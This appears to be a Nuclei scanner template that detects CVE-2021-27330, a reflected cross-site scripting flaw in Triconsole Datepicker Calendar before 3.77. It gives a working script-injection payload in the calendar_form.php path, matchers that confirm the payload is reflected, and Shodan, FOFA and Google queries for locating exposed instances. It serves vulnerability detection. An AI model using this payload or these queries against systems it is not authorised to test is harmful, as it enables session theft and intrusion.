id: CVE-2021-27330

info:
  name: Triconsole Datepicker Calendar <3.77 - Cross-Site Scripting
  author: pikpikcu,daffainfo
  severity: medium
  description: |
    Triconsole Datepicker Calendar before 3.77 contains a cross-site scripting vulnerability in calendar_form.php. Attackers can read authentication cookies that are still active, which can be used to perform further attacks such as reading browser history, directory listings, and file contents.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of Triconsole Datepicker Calendar that properly validates user input to prevent XSS attacks.
  reference:
    - https://www.exploit-db.com/exploits/49597
    - http://www.triconsole.com/
    - http://www.triconsole.com/php/calendar_datepicker.php
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27330
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-27330
    cwe-id: CWE-79
    epss-score: 0.00437
    epss-percentile: 0.74717
    cpe: cpe:2.3:a:triconsole:datepicker_calendar:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: triconsole
    product: datepicker_calendar
    shodan-query: http.title:triconsole.com - php calendar date picker
    fofa-query: title=triconsole.com - php calendar date picker
    google-query:
      - intitle:TriConsole.com - PHP Calendar Date Picker
      - intitle:triconsole.com - php calendar date picker
  tags: cve2021,cve,xss,edb,triconsole

http:
  - method: GET
    path:
      - '{{BaseURL}}/calendar/calendar_form.php/"><script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'
          - '<title>TriConsole.com - PHP Calendar Date Picker</title>'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009965c91c7b448b9aab8a2485f8b9e7596357ece25035f2542a9d990877ada57c022100cb3f8e5ba3da1a61b0eb92ae5a6f410a48d7406f0f3343d2c2371a17d08a446c:922c64590222798bb761d5b6d8e72950